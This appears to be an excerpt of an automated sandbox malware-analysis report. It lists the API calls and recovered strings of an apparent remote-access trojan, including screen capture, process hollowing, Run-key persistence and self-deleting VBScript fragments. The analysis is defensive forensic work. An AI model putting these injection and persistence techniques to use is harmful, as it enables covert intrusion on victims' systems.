                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: p'E$JD
                                                  • API String ID: 1084509184-908320845
                                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                  • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: JD
                                                  • API String ID: 1084509184-2669065882
                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                  • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 1661935332-0
                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                  • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetIconInfo.USER32 ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 479521175-865373369
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32 ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-1447701601
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636D1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                  • API String ID: 3797177996-2483056239
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
